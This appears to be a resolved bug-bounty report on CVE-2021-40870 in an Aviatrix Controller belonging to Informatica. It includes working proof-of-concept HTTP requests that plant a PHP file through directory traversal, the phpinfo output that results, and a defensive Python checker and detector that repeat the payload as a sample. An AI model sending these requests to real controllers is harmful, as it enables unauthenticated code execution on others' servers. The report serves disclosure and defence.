
CVE-2021-40870 in [███]

Critical
Informatica
Reported by fdeleite

Vulnerability Details

Technical details and impact analysis

Code Injection
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

The IP has an SSL certificate pointing to Informatica LLC.

``curl -kvI https://█████████``

Output:

```
Server certificate:
* subject: ██████
```

## Steps To Reproduce

First, run this request:

```
POST /v1/backend1 HTTP/1.1
Host: ████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>
```

Then retrieve the content of the file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``:

```
GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: ████
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```

The response is basically the output of the phpinfo function.

Response (truncated):

```
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">SCRIPT_URL </td><td class="v">/v1/1.php </td></tr>
<tr><td class="e">SCRIPT_URI </td><td class="v">https://█████████/v1/1.php </td></tr>
<tr><td class="e">HTTPS </td><td class="v">on </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_ST </td><td class="v">California </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_L </td><td class="v">Redwood City </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_O </td><td class="v">Informatica LLC </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_OU </td><td class="v">██████ </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_CN </td><td class="v">██████ </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_O </td><td class="v">HydrantID (Avalanche Cloud Corporation) </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_CN </td><td class="v">HydrantID SSL ICA G2 </td></tr>
<tr><td class="e">SSL_SERVER_SAN_DNS_0 </td><td class="v">███ </td></tr>
<tr><td class="e">SSL_VERSION_INTERFACE </td><td class="v">mod_ssl/2.4.39 </td></tr>
```

## Impact

- An unauthenticated, 3rd-party attacker or adversary can execute remote code

### Supporting Material/References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870
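The root cause in the steps above is that `account_name` is joined into a filesystem path without any containment check, so `/../../../var/www/php/...` lands in the web root. The following Python is an added example, not code from the report or from Aviatrix: it shows a containment check a backend could apply before writing, plus a detector that flags form-encoded request bodies shaped like this one. The account directory, the name policy and the sample bodies are assumed/constructed; the parameter names are the ones in the report.

```python
"""Containment check and detector for the account_name traversal pattern.
Added example; ACCOUNT_DIR, SAFE_NAME and SAMPLE_BODIES are assumptions."""
import posixpath
import re
from urllib.parse import parse_qs

# Hypothetical directory the backend writes per-account files into.
ACCOUNT_DIR = "/var/lib/app/accounts"

# Hypothetical allow-list: what a legitimate account name may contain.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolves_inside(base: str, name: str) -> bool:
    """True if base/name, after collapsing '.' and '..', stays under base.
    Note posixpath.join discards base when name is absolute, which is exactly
    why a leading '/' in the reported payload escapes the intended directory."""
    target = posixpath.normpath(posixpath.join(base, name))
    return target == base or target.startswith(base.rstrip("/") + "/")


def is_safe_account_name(name: str) -> bool:
    """Allow-list first, containment second (defence in depth)."""
    return bool(SAFE_NAME.match(name)) and resolves_inside(ACCOUNT_DIR, name)


def flag_traversal_requests(bodies):
    """Scan x-www-form-urlencoded bodies; return indices of requests whose
    account_name escapes ACCOUNT_DIR, names a server-side script, or whose
    data carries a PHP open tag."""
    flagged = []
    for i, body in enumerate(bodies):
        params = parse_qs(body, keep_blank_values=True)
        name = params.get("account_name", [""])[0]
        data = params.get("data", [""])[0]
        if (not resolves_inside(ACCOUNT_DIR, name)
                or name.lower().endswith((".php", ".phtml"))
                or "<?php" in data.lower()):
            flagged.append(i)
    return flagged


# Constructed samples: one benign request, one shaped like the reported one.
SAMPLE_BODIES = [
    "CID=x&action=set_metric_gw_selections&account_name=prod-gw-01&data=gw1,gw2",
    "CID=x&action=set_metric_gw_selections"
    "&account_name=/../../../var/www/php/EXAMPLE.php&data=RCE<?php phpinfo()?>",
]

if __name__ == "__main__":
    print(flag_traversal_requests(SAMPLE_BODIES))  # -> [1]
```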

Related CVEs

Associated Common Vulnerabilities and Exposures

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection